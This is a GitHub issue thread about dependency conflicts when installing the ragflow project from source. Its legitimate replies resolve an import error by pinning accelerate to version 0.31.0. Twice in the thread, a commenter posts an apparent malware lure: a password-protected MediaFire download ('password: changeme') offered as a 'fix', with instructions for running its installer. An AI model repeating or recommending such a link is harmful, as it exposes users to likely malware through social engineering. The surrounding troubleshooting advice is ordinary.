### ISSUE TITLE
[Question]: Start from source code and many dependencies.

### ISSUE THREAD

**Issue by wf-willmer** [infiniflow/ragflow#2180]
### Describe your problem

我的环境：
Operating system: Ubuntu 22.04 (Kernel version: 6.8.0-40-generic)
CPU Type: x86_64
Memory: 
Docker Version: 27.1.2,
Python Version: 3.12.4
拷贝最新源码进行安装，提示缺少一些包，如下ruamel.yaml、python-docx、google.generativeai。
问题1：当pip install google.generativeai 时候 提示protobuf==5.27.2太高 卸载并安装了低版本，是否有影响？
问题2：遇到错误cannot import name 'split_torch_state_dict_into_shards' from 'huggingface_hub'  ，这里选择把accelerate==0.31.0是否有问题？
源码安装感觉包依赖问题较多，不知道对整体影响，所以希望给出一些帮助，非常感谢。

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KevinHuSh** [comment]
Please refer to [this](https://github.com/infiniflow/ragflow/blob/main/requirements.txt)
I just run 'pip install'  when there's no moduales exception while starting up ragflow.

**Comment by houchenll** [comment]
> Please refer to [this](https://github.com/infiniflow/ragflow/blob/main/requirements.txt) I just run 'pip install' when there's no moduales exception while starting up ragflow.

根本跑不起来，问题非常多，解决一个又来一个，解决两个又来一堆

**Comment by wf-willmer** [comment]
问题已经解决，就是中间产生了一些疑问，希望能更好。

**Comment by houchenll** [comment]
> 问题已经解决，就是中间产生了一些疑问，希望能更好。

您好，我遇到了您提到的问题2：`遇到错误cannot import name 'split_torch_state_dict_into_shards' from 'huggingface_hub'`

请问您是怎么解决的

**Comment by houchenll** [comment]
> > 问题已经解决，就是中间产生了一些疑问，希望能更好。
> 
> 您好，我遇到了您提到的问题2：`遇到错误cannot import name 'split_torch_state_dict_into_shards' from 'huggingface_hub'`
> 
> 请问您是怎么解决的

本问题已解决。
原因：安装其他包时由于依赖关系安装了accelerate 0.32.1，引发了本问题  
解决：在 requirement.txt 中添加 accelerate==0.31.0，固定accelerate的版本

**Comment by wf-willmer** [comment]
在 requirement.txt 中添加 accelerate==0.31.0，固定accelerate的版本。我是安装了低版本的就解决了这个问题。


------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "infiniflow/ragflow"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2024年9月3日(星期二) 下午2:10
***@***.***&gt;;
***@***.******@***.***&gt;;
主题:&nbsp;Re: [infiniflow/ragflow] [Question]: Start from source code and many dependencies. (Issue #2180)





   
问题已经解决，就是中间产生了一些疑问，希望能更好。
  
您好，我遇到了您提到的问题2：遇到错误cannot import name 'split_torch_state_dict_into_shards' from 'huggingface_hub'
 
请问您是怎么解决的
  
本问题已解决。
 原因：安装其他包时由于依赖关系安装了accelerate 0.32.1，引发了本问题
 解决：在 requirement.txt 中添加 accelerate==0.31.0，固定accelerate的版本
